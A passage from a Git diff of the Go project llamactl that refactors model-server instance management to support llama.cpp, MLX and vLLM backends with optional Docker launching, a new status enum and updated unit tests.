return i.options.MlxServerOptions.Host
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Host
}
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
@@ -226,11 +145,10 @@ func (i *Process) SetOptions(options *CreateInstanceOptions) {
return
}
// Validate and copy options and apply defaults
optionsCopy := validateAndCopyOptions(i.Name, options)
applyDefaultOptions(optionsCopy, i.globalSettings)
// Validate and copy options
options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = optionsCopy
i.options = options
// Clear the proxy so it gets recreated with new options
i.proxy = nil
}
@@ -253,7 +171,27 @@ func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port))
var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
host = i.options.MlxServerOptions.Host
port = i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
host = i.options.VllmServerOptions.Host
port = i.options.VllmServerOptions.Port
}
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
}
@@ -283,44 +221,55 @@ func (i *Process) MarshalJSON() ([]byte, error) {
i.mu.RLock()
defer i.mu.RUnlock()
// Create a temporary struct with exported fields for JSON marshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{
Name: i.Name,
Options: i.options,
Running: i.Running,
Created: i.Created,
// Determine if docker is enabled for this instance's backend
var dockerEnabled bool
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeVllm:
if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeMlxLm:
// MLX does not support docker currently
}
}
return json.Marshal(temp)
// Use anonymous struct to avoid recursion
type Alias Process
return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
DockerEnabled bool `json:"docker_enabled,omitempty"`
}{
Alias: (*Alias)(i),
Options: i.options,
DockerEnabled: dockerEnabled,
})
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling
temp := struct {
Name string `json:"name"`
// Use anonymous struct to avoid recursion
type Alias Process
aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{}
}{
Alias: (*Alias)(i),
}
if err := json.Unmarshal(data, &temp); err != nil {
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Set the fields
i.Name = temp.Name
i.Running = temp.Running
i.Created = temp.Created
// Handle options with validation but no defaults
if temp.Options != nil {
i.options = validateAndCopyOptions(i.Name, temp.Options)
// Handle options with validation and defaults
if aux.Options != nil {
aux.Options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = aux.Options
}
return nil

View File

@@ -2,6 +2,7 @@ package instance_test
import (
"encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
@@ -10,6 +11,21 @@ import (
)
func TestNewInstance(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
@@ -18,28 +34,32 @@ func TestNewInstance(t *testing.T) {
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if instance.Running {
if inst.IsRunning() {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
// Check that defaults were applied
@@ -55,6 +75,21 @@ func TestNewInstance(t *testing.T) {
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
@@ -71,12 +106,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
// Check that explicit values override defaults
@@ -92,6 +131,21 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
}
func TestSetOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
@@ -100,17 +154,22 @@ func TestSetOptions(t *testing.T) {
}
initialOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, initialOptions, mockOnStatusChange)
// Update options
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
@@ -119,11 +178,11 @@ func TestSetOptions(t *testing.T) {
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
}
// Check that defaults are still applied
@@ -133,18 +192,37 @@ func TestSetOptions(t *testing.T) {
}
func TestGetProxy(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
@@ -166,6 +244,21 @@ func TestGetProxy(t *testing.T) {
}
func TestMarshalJSON(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
@@ -174,13 +267,17 @@ func TestMarshalJSON(t *testing.T) {
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance)
if err != nil {
@@ -188,7 +285,7 @@ func TestMarshalJSON(t *testing.T) {
}
// Check that JSON contains expected fields
var result map[string]interface{}
var result map[string]any
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
@@ -197,8 +294,8 @@ func TestMarshalJSON(t *testing.T) {
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
if result["status"] != "stopped" {
t.Errorf("Expected status 'stopped', got %v", result["status"])
}
// Check that options are included
@@ -210,20 +307,41 @@ func TestMarshalJSON(t *testing.T) {
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
// Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"status": "running",
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
"max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
}
}`
@@ -236,19 +354,25 @@ func TestUnmarshalJSON(t *testing.T) {
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if !inst.Running {
t.Error("Expected running to be true")
if !inst.IsRunning() {
t.Error("Expected status to be running")
}
opts := inst.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
if opts.LlamaServerOptions == nil {
t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
@@ -289,6 +413,21 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
},
}
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -298,12 +437,16 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {

View File

@@ -5,10 +5,14 @@ import (
"fmt"
"log"
"net/http"
"os"
"os/exec"
"runtime"
"syscall"
"time"
"llamactl/pkg/backends"
"llamactl/pkg/config"
)
// Start starts the llama server instance and returns an error if it fails.
@@ -16,7 +20,7 @@ func (i *Process) Start() error {
i.mu.Lock()
defer i.mu.Unlock()
if i.Running {
if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name)
}
@@ -34,15 +38,20 @@ func (i *Process) Start() error {
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create context before building command (needed for CommandContext)
i.ctx, i.cancel = context.WithCancel(context.Background())
// Create log files
if err := i.logger.Create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err)
}
args := i.options.BuildCommandArgs()
i.ctx, i.cancel = context.WithCancel(context.Background())
i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
// Build command using backend-specific methods
cmd, cmdErr := i.buildCommand()
if cmdErr != nil {
return fmt.Errorf("failed to build command: %w", cmdErr)
}
i.cmd = cmd
if runtime.GOOS != "windows" {
setProcAttrs(i.cmd)
@@ -65,7 +74,7 @@ func (i *Process) Start() error {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
}
i.Running = true
i.SetStatus(Running)
// Create channel for monitor completion signaling
i.monitorDone = make(chan struct{})
@@ -82,7 +91,7 @@ func (i *Process) Start() error {
func (i *Process) Stop() error {
i.mu.Lock()
if !i.Running {
if !i.IsRunning() {
// Even if not running, cancel any pending restart
if i.restartCancel != nil {
i.restartCancel()
@@ -99,8 +108,8 @@ func (i *Process) Stop() error {
i.restartCancel = nil
}
// Set running to false first to signal intentional stop
i.Running = false
// Set status to stopped first to signal intentional stop
i.SetStatus(Stopped)
// Clean up the proxy
i.proxy = nil
@@ -110,19 +119,25 @@ func (i *Process) Stop() error {
i.mu.Unlock()
// Stop the process with SIGINT
if i.cmd.Process != nil {
// Stop the process with SIGINT if cmd exists
if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
}
}
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select {
case <-monitorDone:
// Process exited normally
case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds
if i.cmd.Process != nil {
if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill()
if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -144,8 +159,12 @@ func (i *Process) Stop() error {
return nil
}
func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
func (i *Process) WaitForHealthy(timeout int) error {
if !i.Running {
if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name)
}
@@ -163,11 +182,29 @@ func (i *Process) WaitForHealthy(timeout int) error {
}
// Build the health check URL directly
host := opts.Host
var host string
var port int
switch opts.BackendType {
case backends.BackendTypeLlamaCpp:
if opts.LlamaServerOptions != nil {
host = opts.LlamaServerOptions.Host
port = opts.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if opts.MlxServerOptions != nil {
host = opts.MlxServerOptions.Host
port = opts.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if opts.VllmServerOptions != nil {
host = opts.VllmServerOptions.Host
port = opts.VllmServerOptions.Port
}
}
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, opts.Port)
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
@@ -227,12 +264,12 @@ func (i *Process) monitorProcess() {
i.mu.Lock()
// Check if the instance was intentionally stopped
if !i.Running {
if !i.IsRunning() {
i.mu.Unlock()
return
}
i.Running = false
i.SetStatus(Stopped)
i.logger.Close()
// Cancel any existing restart context since we're handling a new exit
@@ -257,6 +294,7 @@ func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock()
return
}
@@ -327,3 +365,53 @@ func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts i
return true, maxRestarts, restartDelay
}
// buildCommand builds the command to execute using backend-specific logic
func (i *Process) buildCommand() (*exec.Cmd, error) {
// Get backend configuration
backendConfig, err := i.getBackendConfig()
if err != nil {
return nil, err
}
// Build the environment variables
env := i.options.BuildEnvironment(backendConfig)
// Get the command to execute
command := i.options.GetCommand(backendConfig)
// Build command arguments
args := i.options.BuildCommandArgs(backendConfig)
// Create the exec.Cmd
cmd := exec.CommandContext(i.ctx, command, args...)
// Start with host environment variables
cmd.Env = os.Environ()
// Add/override with backend-specific environment variables
for k, v := range env {
cmd.Env = append(cmd.Env, fmt.Sprintf("%s=%s", k, v))
}
return cmd, nil
}
// getBackendConfig resolves the backend configuration for the current instance
func (i *Process) getBackendConfig() (*config.BackendSettings, error) {
var backendTypeStr string
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
backendTypeStr = "llama-cpp"
case backends.BackendTypeMlxLm:
backendTypeStr = "mlx"
case backends.BackendTypeVllm:
backendTypeStr = "vllm"
default:
return nil, fmt.Errorf("unsupported backend type: %s", i.options.BackendType)
}
settings := i.globalBackendSettings.GetBackendSettings(backendTypeStr)
return &settings, nil
}

265
pkg/instance/options.go Normal file
View File

@@ -0,0 +1,265 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"log"
"maps"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
//Environment variables
Environment map[string]string `json:"environment,omitempty"`
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// Backend-specific options
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
case backends.BackendTypeMlxLm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.MlxServerOptions = &mlx.MlxServerOptions{}
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
}
}
case backends.BackendTypeVllm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.VllmServerOptions = &vllm.VllmServerOptions{}
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert backend-specific options back to BackendOptions map for JSON
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
data, err := json.Marshal(c.MlxServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
data, err := json.Marshal(c.VllmServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
func (c *CreateInstanceOptions) GetCommand(backendConfig *config.BackendSettings) string {
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
return "docker"
}
return backendConfig.Command
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs(backendConfig *config.BackendSettings) []string {
var args []string
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
// For Docker, start with Docker args
args = append(args, backendConfig.Docker.Args...)
args = append(args, backendConfig.Docker.Image)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildDockerArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildDockerArgs()...)
}
}
} else {
// For native execution, start with backend args
args = append(args, backendConfig.Args...)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
args = append(args, c.MlxServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
}
}
}
return args
}
func (c *CreateInstanceOptions) BuildEnvironment(backendConfig *config.BackendSettings) map[string]string {
env := map[string]string{}
if backendConfig.Environment != nil {
maps.Copy(env, backendConfig.Environment)
}
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
if backendConfig.Docker.Environment != nil {
maps.Copy(env, backendConfig.Docker.Environment)
}
}
if c.Environment != nil {
maps.Copy(env, c.Environment)
}
return env
}

70
pkg/instance/status.go Normal file
View File

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}

View File

@@ -13,7 +13,7 @@ func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.Running || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}

View File

@@ -1,6 +1,7 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
@@ -32,23 +33,45 @@ func (m *MockTimeProvider) SetTime(t time.Time) {
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
